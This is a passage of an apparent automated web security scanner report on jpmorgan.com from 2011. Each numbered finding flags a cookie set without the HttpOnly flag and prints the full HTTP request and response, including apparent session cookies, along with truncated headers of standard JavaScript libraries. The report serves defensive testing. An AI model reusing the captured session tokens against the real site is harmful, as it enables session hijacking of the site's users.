Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:14 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 20:53:29 GMT
Accept-Ranges: bytes
Content-Length: 1078
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

   var lightBoxTime = 0;


   function embedCallback(status)
   {
   }

   function addFlashBoundaryCallback()
   {
       theFlash = document.getElementById('jpmvplayer');
       theFlash.onmouseout=function(e)
       {

...[SNIP]...

11.295. http://www.jpmorgan.com/script/jquery-1.2.6.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jquery-1.2.6.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery-1.2.6.min.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:50 GMT
Server: Apache
Last-Modified: Sat, 15 Nov 2008 02:17:52 GMT
Accept-Ranges: bytes
Content-Length: 94486
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-2
...[SNIP]...

11.296. http://www.jpmorgan.com/script/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery-1.3.2.min.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:12 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 23:36:59 GMT
Accept-Ranges: bytes
Content-Length: 57257
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

11.297. http://www.jpmorgan.com/script/jquery.bgiframe.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jquery.bgiframe.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery.bgiframe.min.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:15 GMT
Server: Apache
Last-Modified: Sat, 21 Jul 2007 22:45:56 GMT
Accept-Ranges: bytes
Content-Length: 1402
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...

11.298. http://www.jpmorgan.com/script/jquery.pngFix.pack.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jquery.pngFix.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery.pngFix.pack.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:12 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 22:55:29 GMT
Accept-Ranges: bytes
Content-Length: 2495
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
*
...[SNIP]...

11.299. http://www.jpmorgan.com/script/jquery_jpm_custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jquery_jpm_custom.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery_jpm_custom.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:14 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 18:40:13 GMT
Accept-Ranges: bytes
Content-Length: 18383
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// tabWidget custom class - Darren Andes
jQuery.fn.tabWidget=function(divTabId,props){props=jQuery.extend({show:0},props?props:{});var _ref=this;this.divTabId=divTabId;this.items=jQuery(this).child
...[SNIP]...

11.300. http://www.jpmorgan.com/script/lightbox_support/builder.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/builder.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/builder.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:16 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:10 GMT
Accept-Ranges: bytes
Content-Length: 4744
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us builder.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// script.aculo.us is freely distributabl
...[SNIP]...

11.301. http://www.jpmorgan.com/script/lightbox_support/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/controls.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/controls.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:24 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:56 GMT
Accept-Ranges: bytes
Content-Length: 34787
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2009 Ivan Krstic (htt
...[SNIP]...

11.302. http://www.jpmorgan.com/script/lightbox_support/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/dragdrop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/dragdrop.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:24 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:45 GMT
Accept-Ranges: bytes
Content-Length: 31056
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us dragdrop.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// script.aculo.us is freely distributab
...[SNIP]...

11.303. http://www.jpmorgan.com/script/lightbox_support/effects.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/effects.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/effects.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:17 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:32 GMT
Accept-Ranges: bytes
Content-Length: 38471
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us effects.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (http://e
...[SNIP]...

11.304. http://www.jpmorgan.com/script/lightbox_support/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/prototype.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:14 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 18:37:43 GMT
Accept-Ranges: bytes
Content-Length: 139854
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

11.305. http://www.jpmorgan.com/script/lightbox_support/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/scriptaculous.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:14 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 18:38:24 GMT
Accept-Ranges: bytes
Content-Length: 2936
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us scriptaculous.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, fr
...[SNIP]...

11.306. http://www.jpmorgan.com/script/lightbox_support/slider.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/slider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/slider.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:17 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:53:09 GMT
Accept-Ranges: bytes
Content-Length: 10162
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us slider.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Marty Haught, Thomas Fuchs
//
// script.aculo.us is freely distributable under the terms of an MIT-style
...[SNIP]...

11.307. http://www.jpmorgan.com/script/lightbox_support/sound.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/sound.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/sound.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:17 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:53:21 GMT
Accept-Ranges: bytes
Content-Length: 2456
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us sound.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Based on code created by Jules Gravinese
...[SNIP]...

11.308. http://www.jpmorgan.com/script/lightview.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightview.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightview.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:14 GMT
Server: Apache
Last-Modified: Wed, 04 Aug 2010 00:45:05 GMT
Accept-Ranges: bytes
Content-Length: 38047
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// Lightview 2.5.2.1 - 01-01-2010
// Copyright (c) 2008-2010 Nick Stakenburg (http://www.nickstakenburg.com)
//
// Licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works
...[SNIP]...

11.309. http://www.jpmorgan.com/script/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/swfobject.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
